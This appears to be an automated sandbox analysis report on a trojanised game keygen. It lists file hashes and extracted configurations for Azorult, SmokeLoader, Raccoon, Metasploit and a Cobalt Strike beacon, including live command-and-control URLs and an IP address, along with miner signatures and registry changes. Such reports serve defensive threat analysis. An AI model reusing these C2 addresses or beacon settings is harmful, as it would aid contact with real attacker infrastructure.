Analysis
-
max time kernel
22s -
max time network
533s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 05:12
Static task
static1
Behavioral task
behavioral1
Sample
Test_Drive_Unlimited_2_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Test_Drive_Unlimited_2_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Test_Drive_Unlimited_2_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Test_Drive_Unlimited_2_keygen.exe
Resource
win10v20201028
General
-
Target
Test_Drive_Unlimited_2_keygen.exe
-
Size
5.2MB
-
MD5
a438d3b681e5250cad13ffbc5a8b1e5f
-
SHA1
e8106fabc033378b3644aa34b815147a77b83539
-
SHA256
297d988321fbbbadd950e60e649f2252049e4380b5824594113ea34c13a41410
-
SHA512
9727bbfc48c98c6caab97bf782122dd18e0cad567a1e7010a827086fc2db91abe85eb23e2cab7c538d9f7f2ffc3ee37463f3ed4c46b329800d76b8b650673c40
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
cobaltstrike
http://74.222.26.215:4443/link
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
74.222.26.215,/link
-
http_header1
AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAcAAAAAAAAACwAAAAMAAAACAAAAK3dvcmRwcmVzc181MjIzODU1OGU5MzBmMWVjNjk5ZTRmMTJhYjAxNWE0Zj0AAAAGAAAABkNvb2tpZQAAAAkAAAAKaWNvbj1mYWxzZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAZQWNjZXB0LUVuY29kaW5nOiBnemlwLCBicgAAAAoAAAAYQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluAAAABwAAAAEAAAANAAAAAwAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
10496
-
maxdns
0
-
month
0
- pipe_name
-
polling_time
63837
-
port_number
4443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\WUAUCLT.exe
-
sc_process64
%windir%\sysnative\WUAUCLT.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+wlp09ycA6U24hmCvgm4N33Jpv343g5vjWOe58OBI8vKq3OLEevLDEYQcQQVIexStT4k5LyBL3VY/Kl1IIUFaTcscIeEFbq0FbBmEOvXm2xe2Abxj1xv1LUFNWnNSwrX76rOKkfBE+ppER/Mw4LyVX4TjTSNsBaGWUa7W43qVlQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
5.44480256e+08
-
unknown2
AAAABAAAAAIAAAJYAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
1.841236305e+09
-
uri
/admin
-
user_agent
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)
-
year
0
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral4/memory/5336-209-0x00000000025A0000-0x0000000002EAA000-memory.dmp family_glupteba behavioral4/memory/5336-211-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral4/memory/5336-210-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral4/memory/5296-172-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/5296-169-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5296-184-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5296-221-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/2288-1229-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/6496-1240-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/6496-1329-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/2288-1358-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 3100 keygen-pr.exe 3368 keygen-step-1.exe 3484 keygen-step-3.exe 3028 keygen-step-4.exe 3240 key.exe 1720 Setup.exe 2924 multitimer.exe 3004 setups.exe 184 askinstall20.exe 2492 setups.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation 2.exe -
Loads dropped DLL 7 IoCs
pid Process 2492 setups.tmp 2492 setups.tmp 2492 setups.tmp 2492 setups.tmp 2492 setups.tmp 2492 setups.tmp 2492 setups.tmp -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 139 ipinfo.io 307 ipinfo.io 310 ipinfo.io 391 ip-api.com 687 ipinfo.io 723 ip-api.com 137 ipinfo.io 574 ipinfo.io 578 ipinfo.io 180 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT 2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
pid pid_target Process procid_target 4136 1592 WerFault.exe 156 4212 4040 WerFault.exe 263 3792 4008 WerFault.exe 157 7844 4008 WerFault.exe 157 4440 4008 WerFault.exe 157 4184 4008 WerFault.exe 157 4196 4008 WerFault.exe 157 408 4008 WerFault.exe 157 3232 4008 WerFault.exe 157 8160 4008 WerFault.exe 157 7584 4008 WerFault.exe 157 6660 4008 WerFault.exe 157 4608 4008 WerFault.exe 157 7796 4008 WerFault.exe 157 7660 4008 WerFault.exe 157 9708 6544 WerFault.exe 256 10628 8664 WerFault.exe 455 -
Delays execution with timeout.exe 5 IoCs
pid Process 1268 timeout.exe 212 timeout.exe 7968 timeout.exe 7232 timeout.exe 11100 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 3436 taskkill.exe 6492 taskkill.exe 7516 taskkill.exe 8512 taskkill.exe 208 taskkill.exe 8004 taskkill.exe 2096 taskkill.exe 3740 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors 2.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" 2.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000d091a5f7522961c94e2ff6ee65ba0f249043a9f00524daeeaf0e3f91f7aa5938e3c2ad28cdb6f6b5e125248808f5bda6ef328a3d6b76704901b877820ccec51657f84660c535ccd99b499be573a916ac09b780636609d37e8f9ec7fdcb3a8e106a5319e50e4500cca3baa8091d76edd86cf00a737f7d1b7046e2aa31f18f1b33f0f2f4d3f3859b6dea985c5505fc630db4fe0ad3a772a5c6a7a2b77d3e6e423eb9f7b935d597edab890344dfdbda9f3ecf014bbf8a884e816500a9d68575848db781a0636e1a7d54cd1b3cbdb3b275dc051a2c13b15fde8cf31a85f31846977c79b06cbba9adf9f54001e79af823c1c6cd6778681f983f6e66123d52917f916910a409a493f24cd30ad38544d1cdfdd6a4096b807dd1d9ffc106d9038ec1ca43f67c3ce25288d2e875b2fff2ee505bf17121b9031cabe6391718004f02add9a99f5a333dde0e29f869bea80f144cf8b107cd5d8dc3c65a0b8c668122bae1cb974e5d1072c42679b26f17bed326615a9dc92ec706dac2de48f4127d5243ff61a643a5017a466f39e449dd03aa382f2febf664f654e93ff0a2746f6dd8da8aa1938e667c3be8ec 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{9ED9BF43-0CF0-4B3D-B51E-1A50B0CE6798} = "0" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" 2.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000842927b2363244cd26a4554c69aa17c78c835ef32a3493cb436ec953f9dbd9d0cd3effff5d123b89bea3734cb0cb57bd3fbf6e76a7a0ae3a39c8edad84ed182960a9c5b485f3fa5d20a07a69608083434ed183fc2f2d2e75614b 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore 2.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History 2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active 2.exe Set value (int) 